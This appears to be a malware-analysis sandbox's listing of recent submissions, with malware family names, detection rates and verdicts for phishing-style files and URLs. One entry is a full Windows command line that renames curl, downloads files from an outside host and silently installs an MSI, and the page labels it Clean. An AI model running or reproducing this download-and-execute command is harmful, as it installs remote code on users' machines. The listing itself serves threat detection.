top title background image
Malware  Trends
flash

Detection Sample Info Download Report Classification & Info Graph
Malicious
  • Yara
  • Sigma
  • Suricata
SmokeLoader
AV: 32%
BzLGqYKy7o.exe
2024-10-07 14:56:11 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
FormBook
AV: 24%
NEW INVOICE.exe
2024-10-07 14:56:06 +02:00
Info
Class
Malicious
AV: 18%
5HnWIsZYYh.exe
2024-10-07 14:55:06 +02:00
Info
Clean
http://https:/www.docusign.net/Signing/EmailStart.aspx?a=172c6dbc-5d24-4b81-bd3d-8e39d5493941&etti=24&acct=4c4d94ee-d10c-4798-8a3e-8ab98a88735a&er=2947b64a-11ed-46c7-a560-bda8655aec2e__;!!O3mv9RujDHg!nL0jpFjwddAgPHk23cqb_WWSWilNN0lJW2gXTJX2BbX1QSY-Ke92OGKUqujVZOCchGDb1xugVKIrECIk$
2024-10-07 14:54:50 +02:00
Info
Malicious
  • Yara
  • Suricata
Socks5Systemz
AV: 21%
jyU2NpOg5L.exe
2024-10-07 14:54:06 +02:00
Info
Class
Malicious
AV: None
_ISDel.exe
2024-10-07 14:52:45 +02:00
No classification & info
Clean
oj5IqW8pvv.dll
2024-10-07 14:51:14 +02:00
Info
Malicious
  • Yara
  • Sigma
  • Suricata
Snake Keylogger, VIP Keylogger
AV: 50%
PO.doc
2024-10-07 14:51:14 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
Remcos
AV: 13%
invoice_45009.xls
2024-10-07 14:51:09 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
Snake Keylogger, VIP Keylogger
AV: 53%
TEKLİF TALEP VE FİYAT TEKLİFİ_xlsx.exe
2024-10-07 14:51:09 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
FormBook
AV: 3%
Payment.vbs
2024-10-07 14:51:09 +02:00
Info
Class
Malicious
  • Yara
  • Sigma
  • Suricata
Remcos
AV: 3%
PAYMENT SPECIFIKACIJA 364846637-pdf.vbs
2024-10-07 14:51:09 +02:00
Info
Class
Clean
HTTP://WWW.MEHAFFYWEBER.COM
2024-10-07 14:46:33 +02:00
No classification & info
no
Graph
Malicious
  • Yara
  • Sigma
  • Suricata
FormBook
AV: 45%
RFQ 245801.exe
2024-10-07 14:46:08 +02:00
Info
Class
Clean
startswinstall.exe
2024-10-07 14:44:07 +02:00
Info
Clean
https://cl.s6.exct.net/?qs=538b7b178f7927056c63a1070f6f68e8fc5197d7fa06b2585b1bc6f9d01c6af8b2355a3f6f99f54696637288fb1659c1f2d3e3b751e8ef7db12b5a4e028c9fe3
2024-10-07 14:42:06 +02:00
Info
Clean
  • Sigma
no Icon
"C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
2024-10-07 14:41:16 +02:00
Info
Malicious
  • Yara
Credential Flusher
AV: 24%
file.exe
2024-10-07 14:37:05 +02:00
Info
Class
Clean
https://ejournals.bib.uni-wuppertal.de/index.php/sws/article/view/740/1337
2024-10-07 14:36:59 +02:00
No classification & info
no
Graph
Malicious
  • Sigma
Tycoon2FA
AV: None
original.eml
2024-10-07 14:34:49 +02:00
Class
no
Graph
Windows: InjectsWrites Registry keysDrops PE FilesHas more than one ProcessHas Email attachmentDisassembly is available
Android: Receives SMS Sends SMS Reboot Native CMD
Common: Generates Internet Traffic Generates HTTP Network Traffic Expired Sample Creates malicious files Contains malware configuration(s)
Customization Show ID column